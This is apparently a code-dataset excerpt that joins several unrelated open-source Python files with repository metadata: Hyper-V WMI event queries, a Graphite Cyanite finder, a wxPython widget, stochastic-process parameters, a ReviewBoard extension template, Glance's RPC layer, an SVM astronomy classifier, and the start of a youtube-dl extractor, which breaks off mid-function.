def get_vm_power_state_change_listener(self, timeframe, filtered_states):
field = self._VM_ENABLED_STATE_PROP
query = self._get_event_wql_query(cls=self._COMPUTER_SYSTEM_CLASS,
field=field,
timeframe=timeframe,
filtered_states=filtered_states)
return self._conn.Msvm_ComputerSystem.watch_for(raw_wql=query,
fields=[field])
def _get_event_wql_query(self, cls, field,
timeframe, filtered_states=None):
"""Return a WQL query used for polling WMI events.
:param cls: the WMI class polled for events
:param field: the field checked
:param timeframe: check for events that occurred in
the specified timeframe
:param filtered_states: only catch events triggered when a WMI
object transitioned into one of those
states.
"""
query = ("SELECT %(field)s, TargetInstance "
"FROM __InstanceModificationEvent "
"WITHIN %(timeframe)s "
"WHERE TargetInstance ISA '%(class)s' "
"AND TargetInstance.%(field)s != "
"PreviousInstance.%(field)s" %
{'class': cls,
'field': field,
'timeframe': timeframe})
if filtered_states:
checks = ["TargetInstance.%s = '%s'" % (field, state)
for state in filtered_states]
query += " AND (%s)" % " OR ".join(checks)
return query
def _get_instance_notes(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vmsettings = self._get_vm_setting_data(vm)
return [note for note in vmsettings.Notes.split('\n') if note]
def get_instance_uuid(self, vm_name):
instance_notes = self._get_instance_notes(vm_name)
if instance_notes and uuidutils.is_uuid_like(instance_notes[0]):
return instance_notes[0]
def get_vm_power_state(self, vm_enabled_state):
return self._enabled_states_map.get(vm_enabled_state,
constants.HYPERV_VM_STATE_OTHER)
| apache-2.0 | -3,523,847,542,262,560,000 | 41.823884 | 79 | 0.574322 | false |
brutasse/graphite-cyanite | cyanite.py | 1 | 3875 | import itertools
import time
try:
from graphite_api.intervals import Interval, IntervalSet
from graphite_api.node import LeafNode, BranchNode
except ImportError:
from graphite.intervals import Interval, IntervalSet
from graphite.node import LeafNode, BranchNode
import requests
def chunk(nodelist, length):
chunklist = []
linelength = 0
for node in nodelist:
# the magic number 6 is because the nodes list gets padded
# with '&path=' in the resulting request
nodelength = len(str(node)) + 6
if linelength + nodelength > length:
yield chunklist
chunklist = [node]
linelength = nodelength
else:
chunklist.append(node)
linelength += nodelength
yield chunklist
class CyaniteLeafNode(LeafNode):
__fetch_multi__ = 'cyanite'
class URLs(object):
def __init__(self, hosts):
self.iterator = itertools.cycle(hosts)
@property
def host(self):
return next(self.iterator)
@property
def paths(self):
return '{0}/paths'.format(self.host)
@property
def metrics(self):
return '{0}/metrics'.format(self.host)
urls = None
urllength = 8000
class CyaniteReader(object):
__slots__ = ('path',)
def __init__(self, path):
self.path = path
def fetch(self, start_time, end_time):
data = requests.get(urls.metrics, params={'path': self.path,
'from': start_time,
'to': end_time}).json()
if 'error' in data:
return (start_time, end_time, end_time - start_time), []
if len(data['series']) == 0:
return
time_info = data['from'], data['to'], data['step']
return time_info, data['series'].get(self.path, [])
def get_intervals(self):
# TODO use cyanite info
return IntervalSet([Interval(0, int(time.time()))])
class CyaniteFinder(object):
__fetch_multi__ = 'cyanite'
def __init__(self, config=None):
global urls
global urllength
if config is not None:
if 'urls' in config['cyanite']:
urls = config['cyanite']['urls']
else:
urls = [config['cyanite']['url'].strip('/')]
if 'urllength' in config['cyanite']:
urllength = config['cyanite']['urllength']
else:
from django.conf import settings
urls = getattr(settings, 'CYANITE_URLS')
if not urls:
urls = [settings.CYANITE_URL]
urllength = getattr(settings, 'CYANITE_URL_LENGTH', urllength)
urls = URLs(urls)
def find_nodes(self, query):
paths = requests.get(urls.paths,
params={'query': query.pattern}).json()
for path in paths:
if path['leaf']:
yield CyaniteLeafNode(path['path'],
CyaniteReader(path['path']))
else:
yield BranchNode(path['path'])
def fetch_multi(self, nodes, start_time, end_time):
paths = [node.path for node in nodes]
data = {}
for pathlist in chunk(paths, urllength):
tmpdata = requests.get(urls.metrics,
params={'path': pathlist,
'from': start_time,
'to': end_time}).json()
if 'error' in tmpdata:
return (start_time, end_time, end_time - start_time), {}
if 'series' in data:
data['series'].update(tmpdata['series'])
else:
data = tmpdata
time_info = data['from'], data['to'], data['step']
return time_info, data['series']
| bsd-3-clause | -7,961,674,116,645,386,000 | 29.753968 | 74 | 0.531097 | false |
ezequielpereira/Time-Line | libs/wx/lib/stattext.py | 6 | 5824 | #----------------------------------------------------------------------
# Name: wx.lib.stattext
# Purpose: A generic wxGenStaticText class. Using this should
# eliminate some of the platform differences in wxStaticText,
# such as background colours and mouse sensitivity.
#
# Author: Robin Dunn
#
# Created: 8-July-2002
# RCS-ID: $Id: stattext.py 49762 2007-11-09 17:50:59Z AG $
# Copyright: (c) 2002 by Total Control Software
# Licence: wxWindows license
#----------------------------------------------------------------------
# 12/12/2003 - Jeff Grimmett ([email protected])
#
# o 2.5 compatability update.
# o Untested.
#
import wx
BUFFERED = 0 # In unbuffered mode we can let the theme shine through,
# is there a way to do this when buffering?
#----------------------------------------------------------------------
class GenStaticText(wx.PyControl):
labelDelta = 1
def __init__(self, parent, ID, label,
pos = wx.DefaultPosition, size = wx.DefaultSize,
style = 0,
name = "genstattext"):
wx.PyControl.__init__(self, parent, ID, pos, size, style|wx.NO_BORDER,
wx.DefaultValidator, name)
wx.PyControl.SetLabel(self, label) # don't check wx.ST_NO_AUTORESIZE yet
self.InheritAttributes()
self.SetInitialSize(size)
self.Bind(wx.EVT_PAINT, self.OnPaint)
if BUFFERED:
self.defBackClr = self.GetBackgroundColour()
self.Bind(wx.EVT_ERASE_BACKGROUND, self.OnEraseBackground)
else:
self.SetBackgroundStyle(wx.BG_STYLE_SYSTEM)
def SetLabel(self, label):
"""
Sets the static text label and updates the control's size to exactly
fit the label unless the control has wx.ST_NO_AUTORESIZE flag.
"""
wx.PyControl.SetLabel(self, label)
style = self.GetWindowStyleFlag()
self.InvalidateBestSize()
if not style & wx.ST_NO_AUTORESIZE:
self.SetSize(self.GetBestSize())
self.Refresh()
def SetFont(self, font):
"""
Sets the static text font and updates the control's size to exactly
fit the label unless the control has wx.ST_NO_AUTORESIZE flag.
"""
wx.PyControl.SetFont(self, font)
style = self.GetWindowStyleFlag()
self.InvalidateBestSize()
if not style & wx.ST_NO_AUTORESIZE:
self.SetSize(self.GetBestSize())
self.Refresh()
def DoGetBestSize(self):
"""
Overridden base class virtual. Determines the best size of
the control based on the label size and the current font.
"""
label = self.GetLabel()
font = self.GetFont()
if not font:
font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
dc = wx.ClientDC(self)
dc.SetFont(font)
maxWidth = totalHeight = 0
for line in label.split('\n'):
if line == '':
w, h = dc.GetTextExtent('W') # empty lines have height too
else:
w, h = dc.GetTextExtent(line)
totalHeight += h
maxWidth = max(maxWidth, w)
best = wx.Size(maxWidth, totalHeight)
self.CacheBestSize(best)
return best
def Enable(self, enable=True):
"""Overridden Enable() method to properly refresh the widget. """
wx.PyControl.Enable(self, enable)
self.Refresh()
def Disable(self):
"""Overridden Disable() method to properly refresh the widget. """
wx.PyControl.Disable(self)
self.Refresh()
def AcceptsFocus(self):
"""Overridden base class virtual."""
return False
def GetDefaultAttributes(self):
"""
Overridden base class virtual. By default we should use
the same font/colour attributes as the native StaticText.
"""
return wx.StaticText.GetClassDefaultAttributes()
def ShouldInheritColours(self):
"""
Overridden base class virtual. If the parent has non-default
colours then we want this control to inherit them.
"""
return True
def OnPaint(self, event):
if BUFFERED:
dc = wx.BufferedPaintDC(self)
else:
dc = wx.PaintDC(self)
width, height = self.GetClientSize()
if not width or not height:
return
if BUFFERED:
clr = self.GetBackgroundColour()
backBrush = wx.Brush(clr, wx.SOLID)
if wx.Platform == "__WXMAC__" and clr == self.defBackClr:
# if colour is still the default then use the striped background on Mac
backBrush.MacSetTheme(1) # 1 == kThemeBrushDialogBackgroundActive
dc.SetBackground(backBrush)
dc.Clear()
if self.IsEnabled():
dc.SetTextForeground(self.GetForegroundColour())
else:
dc.SetTextForeground(wx.SystemSettings.GetColour(wx.SYS_COLOUR_GRAYTEXT))
dc.SetFont(self.GetFont())
label = self.GetLabel()
style = self.GetWindowStyleFlag()
x = y = 0
for line in label.split('\n'):
if line == '':
w, h = self.GetTextExtent('W') # empty lines have height too
else:
w, h = self.GetTextExtent(line)
if style & wx.ALIGN_RIGHT:
x = width - w
if style & wx.ALIGN_CENTER:
x = (width - w)/2
dc.DrawText(line, x, y)
y += h
def OnEraseBackground(self, event):
pass
#----------------------------------------------------------------------
| gpl-3.0 | -7,898,543,669,757,521,000 | 30.652174 | 87 | 0.547218 | false |
NicovincX2/Python-3.5 | Probabilités/Processus stochastique/parameters.py | 1 | 4286 | # -*- coding: utf-8 -*-
import math
import numpy
import random
import decimal
import scipy.linalg
import numpy.random as nrand
import matplotlib.pyplot as plt
class ModelParameters:
"""
Encapsulates model parameters
"""
def __init__(self,
all_s0, all_time, all_delta, all_sigma, gbm_mu,
jumps_lamda=0.0, jumps_sigma=0.0, jumps_mu=0.0,
cir_a=0.0, cir_mu=0.0, all_r0=0.0, cir_rho=0.0,
ou_a=0.0, ou_mu=0.0,
heston_a=0.0, heston_mu=0.0, heston_vol0=0.0):
# This is the starting asset value
self.all_s0 = all_s0
# This is the amount of time to simulate for
self.all_time = all_time
# This is the delta, the rate of time e.g. 1/252 = daily, 1/12 =
# monthly
self.all_delta = all_delta
# This is the volatility of the stochastic processes
self.all_sigma = all_sigma
# This is the annual drift factor for geometric brownian motion
self.gbm_mu = gbm_mu
# This is the probability of a jump happening at each point in time
self.lamda = jumps_lamda
# This is the volatility of the jump size
self.jumps_sigma = jumps_sigma
# This is the average jump size
self.jumps_mu = jumps_mu
# This is the rate of mean reversion for Cox Ingersoll Ross
self.cir_a = cir_a
# This is the long run average interest rate for Cox Ingersoll Ross
self.cir_mu = cir_mu
# This is the starting interest rate value
self.all_r0 = all_r0
# This is the correlation between the wiener processes of the Heston
# model
self.cir_rho = cir_rho
# This is the rate of mean reversion for Ornstein Uhlenbeck
self.ou_a = ou_a
# This is the long run average interest rate for Ornstein Uhlenbeck
self.ou_mu = ou_mu
# This is the rate of mean reversion for volatility in the Heston model
self.heston_a = heston_a
# This is the long run average volatility for the Heston model
self.heston_mu = heston_mu
# This is the starting volatility value for the Heston model
self.heston_vol0 = heston_vol0
mp = ModelParameters(all_s0=1000,
all_r0=0.5,
all_time=800,
all_delta=0.00396825396,
all_sigma=0.125,
gbm_mu=0.058,
jumps_lamda=0.00125,
jumps_sigma=0.001,
jumps_mu=-0.2,
cir_a=3.0,
cir_mu=0.5,
cir_rho=0.5,
ou_a=3.0,
ou_mu=0.5,
heston_a=0.25,
heston_mu=0.35,
heston_vol0=0.06125)
paths = 15
def plot_stochastic_processes(processes, title):
"""
This method plots a list of stochastic processes with a specified title
:return: plots the graph of the two
"""
plt.style.use(['bmh'])
fig, ax = plt.subplots(1)
fig.suptitle(title, fontsize=16)
ax.set_xlabel('Time, t')
ax.set_ylabel('Simulated Asset Price')
x_axis = numpy.arange(0, len(processes[0]), 1)
for i in range(len(processes)):
plt.plot(x_axis, processes[i])
plt.show()
def convert_to_returns(log_returns):
"""
This method exponentiates a sequence of log returns to get daily returns.
:param log_returns: the log returns to exponentiated
:return: the exponentiated returns
"""
return numpy.exp(log_returns)
def convert_to_prices(param, log_returns):
"""
This method converts a sequence of log returns into normal returns (exponentiation) and then computes a price
sequence given a starting price, param.all_s0.
:param param: the model parameters object
:param log_returns: the log returns to exponentiated
:return:
"""
returns = convert_to_returns(log_returns)
# A sequence of prices starting with param.all_s0
price_sequence = [param.all_s0]
for i in range(1, len(returns)):
# Add the price at t-1 * return at t
price_sequence.append(price_sequence[i - 1] * returns[i - 1])
return numpy.array(price_sequence)
| gpl-3.0 | -1,243,897,321,032,333,800 | 34.716667 | 113 | 0.589827 | false |
atagar/ReviewBoard | contrib/tools/templates/extensions/extension/extension.py | 2 | 1347 | # {{extension_name}} Extension for Review Board.
from django.conf import settings
from django.conf.urls.defaults import patterns, include
from reviewboard.extensions.base import Extension
{%- if dashboard_link is not none %}
from reviewboard.extensions.hooks import DashboardHook, URLHook
{% endif %}
{%- if dashboard_link is not none %}
class {{class_name}}URLHook(URLHook):
def __init__(self, extension, *args, **kwargs):
pattern = patterns('', (r'^{{package_name}}/',
include('{{package_name}}.urls')))
super({{class_name}}URLHook, self).__init__(extension, pattern)
class {{class_name}}DashboardHook(DashboardHook):
def __init__(self, extension, *args, **kwargs):
entries = [{
'label': '{{dashboard_link}}',
'url': settings.SITE_ROOT + '{{package_name}}/',
}]
super({{class_name}}DashboardHook, self).__init__(extension,
entries=entries, *args, **kwargs)
{%- endif %}
class {{class_name}}(Extension):
{%- if is_configurable %}
is_configurable = True
{%- endif %}
def __init__(self, *args, **kwargs):
super({{class_name}}, self).__init__()
{%- if dashboard_link is not none %}
self.url_hook = {{class_name}}URLHook(self)
self.dashboard_hook = {{class_name}}DashboardHook(self)
{%- endif %}
| mit | 7,088,152,217,563,539,000 | 34.447368 | 71 | 0.610245 | false |
yanheven/glance | glance/common/rpc.py | 5 | 9265 | # Copyright 2013 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
RPC Controller
"""
import datetime
import traceback
from oslo_config import cfg
from oslo_log import log as logging
import oslo_utils.importutils as imp
from oslo_utils import timeutils
import six
from webob import exc
from glance.common import client
from glance.common import exception
from glance.common import utils
from glance.common import wsgi
from glance import i18n
LOG = logging.getLogger(__name__)
_ = i18n._
_LE = i18n._LE
rpc_opts = [
# NOTE(flaper87): Shamelessly copied
# from oslo rpc.
cfg.ListOpt('allowed_rpc_exception_modules',
default=['openstack.common.exception',
'glance.common.exception',
'exceptions',
],
help='Modules of exceptions that are permitted to be recreated'
' upon receiving exception data from an rpc call.'),
]
CONF = cfg.CONF
CONF.register_opts(rpc_opts)
class RPCJSONSerializer(wsgi.JSONResponseSerializer):
def _sanitizer(self, obj):
def to_primitive(_type, _value):
return {"_type": _type, "_value": _value}
if isinstance(obj, datetime.datetime):
return to_primitive("datetime", timeutils.strtime(obj))
return super(RPCJSONSerializer, self)._sanitizer(obj)
class RPCJSONDeserializer(wsgi.JSONRequestDeserializer):
def _to_datetime(self, obj):
return timeutils.parse_strtime(obj)
def _sanitizer(self, obj):
try:
_type, _value = obj["_type"], obj["_value"]
return getattr(self, "_to_" + _type)(_value)
except (KeyError, AttributeError):
return obj
class Controller(object):
"""
Base RPCController.
This is the base controller for RPC based APIs. Commands
handled by this controller respect the following form:
[{
'command': 'method_name',
'kwargs': {...}
}]
The controller is capable of processing more than one command
per request and will always return a list of results.
:params raise_exc: Boolean that specifies whether to raise
exceptions instead of "serializing" them.
"""
def __init__(self, raise_exc=False):
self._registered = {}
self.raise_exc = raise_exc
def register(self, resource, filtered=None, excluded=None, refiner=None):
"""
Exports methods through the RPC Api.
:params resource: Resource's instance to register.
:params filtered: List of methods that *can* be registered. Read
as "Method must be in this list".
:params excluded: List of methods to exclude.
:params refiner: Callable to use as filter for methods.
:raises AssertionError: If refiner is not callable.
"""
funcs = filter(lambda x: not x.startswith("_"), dir(resource))
if filtered:
funcs = [f for f in funcs if f in filtered]
if excluded:
funcs = [f for f in funcs if f not in excluded]
if refiner:
assert callable(refiner), "Refiner must be callable"
funcs = filter(refiner, funcs)
for name in funcs:
meth = getattr(resource, name)
if not callable(meth):
continue
self._registered[name] = meth
def __call__(self, req, body):
"""
Executes the command
"""
if not isinstance(body, list):
msg = _("Request must be a list of commands")
raise exc.HTTPBadRequest(explanation=msg)
def validate(cmd):
if not isinstance(cmd, dict):
msg = _("Bad Command: %s") % str(cmd)
raise exc.HTTPBadRequest(explanation=msg)
command, kwargs = cmd.get("command"), cmd.get("kwargs")
if (not command or not isinstance(command, six.string_types) or
(kwargs and not isinstance(kwargs, dict))):
msg = _("Wrong command structure: %s") % (str(cmd))
raise exc.HTTPBadRequest(explanation=msg)
method = self._registered.get(command)
if not method:
# Just raise 404 if the user tries to
# access a private method. No need for
# 403 here since logically the command
# is not registered to the rpc dispatcher
raise exc.HTTPNotFound(explanation=_("Command not found"))
return True
# If more than one command were sent then they might
# be intended to be executed sequentially, that for,
# lets first verify they're all valid before executing
# them.
commands = filter(validate, body)
results = []
for cmd in commands:
# kwargs is not required
command, kwargs = cmd["command"], cmd.get("kwargs", {})
method = self._registered[command]
try:
result = method(req.context, **kwargs)
except Exception as e:
if self.raise_exc:
raise
cls, val = e.__class__, utils.exception_to_str(e)
msg = (_LE("RPC Call Error: %(val)s\n%(tb)s") %
dict(val=val, tb=traceback.format_exc()))
LOG.error(msg)
# NOTE(flaper87): Don't propagate all exceptions
# but the ones allowed by the user.
module = cls.__module__
if module not in CONF.allowed_rpc_exception_modules:
cls = exception.RPCError
val = six.text_type(exception.RPCError(cls=cls, val=val))
cls_path = "%s.%s" % (cls.__module__, cls.__name__)
result = {"_error": {"cls": cls_path, "val": val}}
results.append(result)
return results
class RPCClient(client.BaseClient):
def __init__(self, *args, **kwargs):
self._serializer = RPCJSONSerializer()
self._deserializer = RPCJSONDeserializer()
self.raise_exc = kwargs.pop("raise_exc", True)
self.base_path = kwargs.pop("base_path", '/rpc')
super(RPCClient, self).__init__(*args, **kwargs)
@client.handle_unauthenticated
def bulk_request(self, commands):
"""
Execute multiple commands in a single request.
:params commands: List of commands to send. Commands
must respect the following form:
{
'command': 'method_name',
'kwargs': method_kwargs
}
"""
body = self._serializer.to_json(commands)
response = super(RPCClient, self).do_request('POST',
self.base_path,
body)
return self._deserializer.from_json(response.read())
def do_request(self, method, **kwargs):
"""
Simple do_request override. This method serializes
the outgoing body and builds the command that will
be sent.
:params method: The remote python method to call
:params kwargs: Dynamic parameters that will be
passed to the remote method.
"""
content = self.bulk_request([{'command': method,
'kwargs': kwargs}])
# NOTE(flaper87): Return the first result if
# a single command was executed.
content = content[0]
# NOTE(flaper87): Check if content is an error
# and re-raise it if raise_exc is True. Before
# checking if content contains the '_error' key,
# verify if it is an instance of dict - since the
# RPC call may have returned something different.
if self.raise_exc and (isinstance(content, dict)
and '_error' in content):
error = content['_error']
try:
exc_cls = imp.import_class(error['cls'])
raise exc_cls(error['val'])
except ImportError:
# NOTE(flaper87): The exception
# class couldn't be imported, using
# a generic exception.
raise exception.RPCError(**error)
return content
def __getattr__(self, item):
"""
This method returns a method_proxy that
will execute the rpc call in the registry
service.
"""
if item.startswith('_'):
raise AttributeError(item)
def method_proxy(**kw):
return self.do_request(item, **kw)
return method_proxy
| apache-2.0 | 7,369,825,429,521,806,000 | 32.207885 | 79 | 0.575175 | false |
dantebarba/docker-media-server | plex/IPTV.bundle/Contents/Code/locale_patch.py | 4 | 3262 | # -*- coding: utf-8 -*-
"""
Localization patch for Plex Media Server channels
https://bitbucket.org/czukowski/plex-locale-patch/
Copyright: 2015, Korney Czukowski
License: MIT
"""
languages = list()
# Translate function override to avoid unicode decoding bug.
def L(string):
initialize_locale()
local_string = Locale.LocalString(string)
return str(local_string).decode()
def SetAvailableLanguages(list):
global languages
languages = list
# Client language detection.
# Make sure this function does its thing only the first time it's called (once per request).
def initialize_locale():
if 'Plex-Locale-Patch' in Request.Headers:
return
for parse_func in [parse_x_plex_language_value, parse_accept_language_value]:
value = parse_func()
if value:
set_language_header(value)
break
if not value:
Log('Locale Patch: language not detected. All request headers: %s' % str(Request.Headers))
Request.Headers['Plex-Locale-Patch'] = 'y'
# Parse 'X-Plex-Language' header
def parse_x_plex_language_value():
if 'X-Plex-Language' in Request.Headers:
header_value = Request.Headers['X-Plex-Language']
matched_value = Locale.Language.Match(header_value)
if matched_value == 'xx':
return
Log('Locale Patch: found language in X-Plex-Language header ("%s" matched to "%s")' % (header_value, matched_value))
return select_available_language([matched_value])
# Parse 'Accept-Language' header
# Based on http://stackoverflow.com/a/17911139
def parse_accept_language_value():
if 'Accept-Language' in Request.Headers:
header_value = Request.Headers['Accept-Language']
# Extract all locales and their preference (q)
locales = [] # e.g. [('es', 1.0), ('en-US', 0.8), ('en', 0.6)]
for locale_str in header_value.replace(' ', '').lower().split(','):
locale_parts = locale_str.split(';q=')
locale = locale_parts[0]
if len(locale_parts) > 1:
locale_q = float(locale_parts[1])
else:
locale_q = 1.0
locales.append((locale, locale_q))
# Sort locales according to preference
locales.sort(key=lambda locale_tuple: locale_tuple[1], reverse=True)
# Remove weights from the list, keep only locale names
locales = map(lambda locale_tuple: locale_tuple[0], locales)
if len(locales):
Log('Locale Patch: found languages in Accept-Language header (%s)' % header_value)
return select_available_language(locales)
def select_available_language(locales):
global languages
if not len(languages):
Log('Locale Patch: no known available languages, using "%s" as the %s choise. Call SetAvailableLanguages(list) function to improve this.' % (locales[0], 'only' if len(languages) == 1 else 'first'))
return locales[0]
for item in locales:
if item in languages:
Log('Locale Patch: using available language "%s".' % item)
return item
Log('Locale Patch: none of the languages matched available languages.')
def set_language_header(value):
Request.Headers['X-Plex-Language'] = value | gpl-3.0 | -667,973,978,703,167,900 | 36.505747 | 205 | 0.644083 | false |
raphv/cardmapper | src/cardapp/migrations/0002_date fix.py | 1 | 1361 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-23 09:54
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cardapp', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='card',
name='date_created',
field=models.DateTimeField(auto_now_add=True, db_index=True),
),
migrations.AlterField(
model_name='card',
name='date_updated',
field=models.DateTimeField(auto_now=True, db_index=True),
),
migrations.AlterField(
model_name='cardmap',
name='date_created',
field=models.DateTimeField(auto_now_add=True, db_index=True),
),
migrations.AlterField(
model_name='cardmap',
name='date_updated',
field=models.DateTimeField(auto_now=True, db_index=True),
),
migrations.AlterField(
model_name='deck',
name='date_created',
field=models.DateTimeField(auto_now_add=True, db_index=True),
),
migrations.AlterField(
model_name='deck',
name='date_updated',
field=models.DateTimeField(auto_now=True, db_index=True),
),
]
| mit | -6,418,556,618,558,211,000 | 29.244444 | 73 | 0.559882 | false |
portnov/sverchok | utils/text_editor_submenu.py | 3 | 2474 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import os
import bpy
from bpy.props import StringProperty
from sverchok.utils.sv_update_utils import sv_get_local_path
sv_path = os.path.dirname(sv_get_local_path()[0])
def get_template_path():
return os.path.join(sv_path, "node_scripts", "templates")
def get_templates():
path = get_template_path()
return [(t, t, "") for t in next(os.walk(path))[2]]
class SvScriptLoader(bpy.types.Operator):
""" Load Scripts into TextEditor """
bl_idname = "node.script_template"
bl_label = "Sverchok script template"
bl_options = {'REGISTER', 'UNDO'}
# from object in
script_path = StringProperty(name='script path')
def execute(self, context):
path = get_template_path()
file_to_load = os.path.join(path, self.script_path)
bpy.ops.text.open(filepath=file_to_load, internal=True)
return {'FINISHED'}
class SvTextSubMenu(bpy.types.Menu):
bl_idname = "TEXT_MT_templates_submenu"
bl_label = "Sv NodeScripts"
bl_options = {'REGISTER', 'UNDO'}
def draw(self, context):
layout = self.layout
m = get_templates()
t = "node.script_template"
for name, p, _ in m:
layout.operator(t, text=name).script_path = p
def menu_draw(self, context):
self.layout.menu("TEXT_MT_templates_submenu")
def register():
bpy.utils.register_class(SvScriptLoader)
bpy.utils.register_class(SvTextSubMenu)
bpy.types.TEXT_MT_templates.append(menu_draw)
def unregister():
bpy.utils.unregister_class(SvScriptLoader)
bpy.utils.unregister_class(SvTextSubMenu)
bpy.types.TEXT_MT_templates.remove(menu_draw)
if __name__ == "__main__":
register()
| gpl-3.0 | -4,420,080,900,627,678,700 | 28.105882 | 74 | 0.681892 | false |
ipashchenko/ml4vs | ml4vs/svm_final.py | 1 | 4272 | import os
import numpy as np
from sklearn.cross_validation import (StratifiedShuffleSplit, StratifiedKFold,
cross_val_score)
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import Imputer
from sklearn.svm import SVC
from data_load import load_data, load_data_tgt
data_dir = '/home/ilya/code/ml4vs/data/LMC_SC20__corrected_list_of_variables/raw_index_values'
file_1 = 'vast_lightcurve_statistics_variables_only.log'
file_0 = 'vast_lightcurve_statistics_constant_only.log'
file_0 = os.path.join(data_dir, file_0)
file_1 = os.path.join(data_dir, file_1)
names = ['Magnitude', 'clipped_sigma', 'meaningless_1', 'meaningless_2',
'star_ID', 'weighted_sigma', 'skew', 'kurt', 'I', 'J', 'K', 'L',
'Npts', 'MAD', 'lag1', 'RoMS', 'rCh2', 'Isgn', 'Vp2p', 'Jclp', 'Lclp',
'Jtim', 'Ltim', 'CSSD', 'Ex', 'inv_eta', 'E_A', 'S_B', 'NXS', 'IQR']
names_to_delete = ['meaningless_1', 'meaningless_2', 'star_ID',
'Npts', 'CSSD', 'clipped_sigma', 'lag1', 'L', 'Lclp', 'Jclp',
'MAD', 'Ltim']
X, y, df, feature_names, delta = load_data([file_0, file_1], names,
names_to_delete)
clf = SVC(C=37.3, class_weight={0: 1, 1: 3}, probability=True,
gamma=0.0126, random_state=1)
estimators = list()
estimators.append(('imputer', Imputer(missing_values='NaN', strategy='median',
axis=0, verbose=2)))
estimators.append(('scaler', StandardScaler()))
estimators.append(('clf', clf))
pipeline = Pipeline(estimators)
# Fit on all training data
pipeline.fit(X, y)
# Load blind test data
file_tgt = 'LMC_SC19_PSF_Pgood98__vast_lightcurve_statistics.log'
file_tgt = os.path.join(data_dir, file_tgt)
names = ['Magnitude', 'clipped_sigma', 'meaningless_1', 'meaningless_2',
'star_ID', 'weighted_sigma', 'skew', 'kurt', 'I', 'J', 'K', 'L',
'Npts', 'MAD', 'lag1', 'RoMS', 'rCh2', 'Isgn', 'Vp2p', 'Jclp', 'Lclp',
'Jtim', 'Ltim', 'CSSD', 'Ex', 'inv_eta', 'E_A', 'S_B', 'NXS', 'IQR']
names_to_delete = ['meaningless_1', 'meaningless_2', 'star_ID',
'Npts', 'CSSD', 'clipped_sigma', 'lag1', 'L', 'Lclp', 'Jclp',
'MAD', 'Ltim']
X_tgt, feature_names, df, df_orig = load_data_tgt(file_tgt, names,
names_to_delete, delta)
y_pred = pipeline.predict(X_tgt)
y_probs = pipeline.predict_proba(X_tgt)[:, 1]
idx = y_probs > 0.5
idx_ = y_probs < 0.5
svm_no = list(df_orig['star_ID'][idx_])
print("Found {} variables".format(np.count_nonzero(idx)))
with open('svm_results_final.txt', 'w') as fo:
for line in list(df_orig['star_ID'][idx]):
fo.write(line + '\n')
# Check F1
with open('clean_list_of_new_variables.txt', 'r') as fo:
news = fo.readlines()
news = [line.strip().split(' ')[1] for line in news]
news = set(news)
with open('svm_results_final.txt', 'r') as fo:
svm = fo.readlines()
svm = [line.strip().split('_')[4].split('.')[0] for line in svm]
svm = set(svm)
print "Among new vars found {}".format(len(news.intersection(svm)))
with open('candidates_50perc_threshold.txt', 'r') as fo:
c50 = fo.readlines()
c50 = [line.strip("\", ', \", \n, }, {") for line in c50]
with open('variables_not_in_catalogs.txt', 'r') as fo:
not_in_cat = fo.readlines()
nic = [line.strip().split(' ')[1] for line in not_in_cat]
# Catalogue variables
cat_vars = set(c50).difference(set(nic))
# Non-catalogue variable
noncat_vars = set([line.strip().split(' ')[1] for line in not_in_cat if 'CST' not in line])
# All variables
all_vars = news.union(cat_vars).union(noncat_vars)
svm_no = set([line.strip().split('_')[4].split('.')[0] for line in svm_no])
found_bad = '181193' in svm
print "Found known variable : ", found_bad
FN = len(svm_no.intersection(all_vars))
TP = len(all_vars.intersection(svm))
TN = len(svm_no) - FN
FP = len(svm) - TP
recall = float(TP) / (TP + FN)
precision = float(TP) / (TP + FP)
F1 = 2 * precision * recall / (precision + recall)
print "precision: {}".format(precision)
print "recall: {}".format(recall)
print "F1: {}".format(F1)
print "TN={}, FP={}".format(TN, FP)
print "FN={}, TP={}".format(FN, TP)
| mit | 1,784,097,725,569,974,800 | 38.555556 | 94 | 0.606742 | false |
Tithen-Firion/youtube-dl | youtube_dl/extractor/amp.py | 3 | 3633 | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
int_or_none,
parse_iso8601,
mimetype2ext,
determine_ext,
ExtractorError,
)
class AMPIE(InfoExtractor):
# parse Akamai Adaptive Media Player feed
def _extract_feed_info(self, url):
feed = self._download_json(
url, None, 'Downloading Akamai AMP feed',
'Unable to download Akamai AMP feed')
item = feed.get('channel', {}).get('item')
if not item:
raise ExtractorError('%s said: %s' % (self.IE_NAME, feed['error']))
video_id = item['guid']
def get_media_node(name, default=None):
media_name = 'media-%s' % name
media_group = item.get('media-group') or item
return media_group.get(media_name) or item.get(media_name) or item.get(name, default)
thumbnails = []
media_thumbnail = get_media_node('thumbnail')
if media_thumbnail:
if isinstance(media_thumbnail, dict):
media_thumbnail = [media_thumbnail]
for thumbnail_data in media_thumbnail:
thumbnail = thumbnail_data['@attributes']
thumbnails.append({
'url': self._proto_relative_url(thumbnail['url'], 'http:'),
'width': int_or_none(thumbnail.get('width')),
'height': int_or_none(thumbnail.get('height')),
})
subtitles = {}
media_subtitle = get_media_node('subTitle')
